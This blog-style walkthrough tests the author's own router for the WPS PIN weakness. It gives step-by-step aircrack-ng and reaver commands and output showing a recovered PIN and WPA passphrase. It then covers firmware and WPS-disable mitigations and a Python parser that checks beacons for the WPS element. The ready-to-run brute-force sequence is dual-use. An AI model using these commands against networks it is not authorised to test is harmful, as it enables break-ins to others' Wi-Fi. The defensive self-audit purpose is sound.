In order to do this, you must have a WiFi card that can enter monitor mode. The Panda PAU05 300Mbps worked well for me, but I cannot guarantee that the card will work for you. Some cards of the same model ship with different chipsets, or have new versions released. Buy an appropriate card at your own risk!

Without a working card, you will be unable to carry out this test.

Install the necessary tools.

sudo apt-get install \
	aircrack-ng \
	reaver
Disable your WiFi interface.

sudo ifconfig wlan0 down

Enable monitor mode for your WiFi interface.

sudo airmon-ng start wlan0

Note the name of the monitor-mode interface printed by the command above. In my case, it is wlan0mon.

Kill processes that may conflict with airmon tools.

sudo airmon-ng check kill

Scan for a network. The PWR column indicates signal strength in dBm: the closer the value is to zero, the stronger the signal, so -20 is a much better signal than -74.

sudo airodump-ng wlan0mon

Test the AP for the WPS vulnerability using reaver, which is designed specifically for this attack. Pass the monitor interface with -i, the access point's channel with -c, and its BSSID (the router's MAC address) with -b.

sudo reaver \
	-i wlan0mon \
	-c 2 \
	-b 22:46:BA:34:CB:18 \
	-vv \
	-L \
	-N \
	-d 30 \
	-T 1 \
	-r 3:15

If your access point is vulnerable, the WPS pin will eventually be discovered.

[+] Pin cracked in 273832 seconds
[+] WPS PIN: '29701453'
[+] WPA PSK: 'thepassword123'
[+] AP SSID: 'MyAccessPoint'

My router was compromised in 273832 seconds, which is just over 3 days.

My Netgear WNR2000v3 was then updated to the latest firmware as listed here.

Current Firmware Version:     V1.0.1.26
New Firmware Version:         V1.1.2.18
Current GUI Language Version: V1.0.0.55
New GUI Language Version:     V1.0.0.175

This upgrade automatically enables a 3 second lockout for failed WPS attempts.

Unfortunately, reaver did not seem to care, and went to work hacking the PIN just as it did before. It was not affected by that lockout setting.

I then disabled WPS entirely in the admin interface. As many articles mention, some routers don't actually disable WPS even if the interface implies it is disabled.

In cases like that, it seems the only reliable preventative measure is to either get a router that actually disables WPS, or install DD-WRT on your router.

Fortunately, this firmware upgrade actually worked in my case, and reaver was unable to determine my PIN.
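A router that has really turned WPS off stops including the WSC vendor-specific information element (OUI 00:50:F2, type 4) in its beacon frames, and a router in its lockout window sets the "AP Setup Locked" attribute inside that element. This is the same information that scanners such as wash (shipped with reaver) read off the air, and it is the most direct way to confirm that an admin-interface change actually took effect. The parser below is an added example and is not code from the post; the beacon tagged-parameter byte strings, the build_wsc_ie helper, the function names, and the device name and channel values are constructed for the example. The attribute IDs come from the Wi-Fi Simple Configuration specification.

```python
# Added example (not from the original post): decode the WSC (WPS) information
# element from a beacon's tagged parameters to see whether an AP still
# advertises WPS, whether it is configured, and whether it currently reports
# "AP Setup Locked". All sample beacon bytes below are constructed, not captured.
import struct

WPS_OUI_TYPE = bytes.fromhex("0050f204")   # OUI 00:50:F2, vendor type 4 = WSC

# Attribute IDs from the Wi-Fi Simple Configuration (WSC) specification
ATTR_VERSION = 0x104A
ATTR_WPS_STATE = 0x1044          # 1 = not configured, 2 = configured
ATTR_AP_SETUP_LOCKED = 0x1057    # 1 = AP refuses external registrars for now
ATTR_DEVICE_NAME = 0x1011
ATTR_CONFIG_METHODS = 0x1008


def iter_information_elements(tagged_params):
    """Yield (element_id, payload) for each 802.11 tagged parameter (1-byte id, 1-byte length)."""
    i = 0
    while i + 2 <= len(tagged_params):
        eid, length = tagged_params[i], tagged_params[i + 1]
        payload = tagged_params[i + 2:i + 2 + length]
        if len(payload) < length:
            break  # truncated element: stop rather than mis-parse the tail
        yield eid, payload
        i += 2 + length


def parse_wps_attributes(wsc_body):
    """Parse WSC TLVs: 2-byte attribute id, 2-byte length, value (all big-endian)."""
    attrs = {}
    i = 0
    while i + 4 <= len(wsc_body):
        attr_id, length = struct.unpack(">HH", wsc_body[i:i + 4])
        value = wsc_body[i + 4:i + 4 + length]
        if len(value) < length:
            break
        attrs[attr_id] = value
        i += 4 + length
    return attrs


def wps_status(tagged_params):
    """Describe the WPS state advertised in a beacon's tagged parameters.

    wps_advertised=False means no WSC vendor IE is present at all, which is
    what a router that has genuinely disabled WPS should look like.
    """
    for eid, payload in iter_information_elements(tagged_params):
        if eid == 0xDD and payload.startswith(WPS_OUI_TYPE):
            attrs = parse_wps_attributes(payload[len(WPS_OUI_TYPE):])
            state = attrs.get(ATTR_WPS_STATE, b"\x00")[0]
            locked = attrs.get(ATTR_AP_SETUP_LOCKED, b"\x00")[0] == 1
            name = attrs.get(ATTR_DEVICE_NAME, b"").decode("utf-8", "replace")
            return {"wps_advertised": True, "configured": state == 2,
                    "ap_setup_locked": locked, "device_name": name}
    return {"wps_advertised": False, "configured": None,
            "ap_setup_locked": None, "device_name": ""}


def build_wsc_ie(attributes):
    """Build a vendor-specific IE carrying WSC TLVs; used only to construct samples."""
    body = b"".join(struct.pack(">HH", aid, v) if False else
                    struct.pack(">HH", aid, len(v)) + v for aid, v in attributes)
    payload = WPS_OUI_TYPE + body
    return bytes([0xDD, len(payload)]) + payload


# Constructed sample beacons: SSID and channel mirror the post's output, the
# device name is a made-up label, and 0x0088 = Label + PushButton config methods.
SSID_IE = bytes([0x00, 13]) + b"MyAccessPoint"
DS_IE = bytes([0x03, 1, 2])                       # DS Parameter Set: channel 2
BEACON_WPS_OPEN = SSID_IE + DS_IE + build_wsc_ie([
    (ATTR_VERSION, b"\x10"), (ATTR_WPS_STATE, b"\x02"),
    (ATTR_DEVICE_NAME, b"WNR2000v3"), (ATTR_CONFIG_METHODS, b"\x00\x88")])
BEACON_WPS_LOCKED = SSID_IE + DS_IE + build_wsc_ie([
    (ATTR_VERSION, b"\x10"), (ATTR_WPS_STATE, b"\x02"),
    (ATTR_AP_SETUP_LOCKED, b"\x01"), (ATTR_DEVICE_NAME, b"WNR2000v3")])
BEACON_WPS_OFF = SSID_IE + DS_IE                  # no WSC IE at all

if __name__ == "__main__":
    for label, beacon in [("open", BEACON_WPS_OPEN), ("locked", BEACON_WPS_LOCKED),
                          ("off", BEACON_WPS_OFF)]:
        print(label, wps_status(beacon))
```

To run this against a real beacon, feed it the frame body after the 12 bytes of fixed fields (8-byte timestamp, 2-byte beacon interval, 2-byte capability info); everything from there on is the tagged-parameter list the parser expects. Seeing wps_advertised come back False for your own SSID is the confirmation that the "disable WPS" toggle really did something; a beacon that still carries the WSC element with configured=True means the setting did not take, regardless of what the admin page shows.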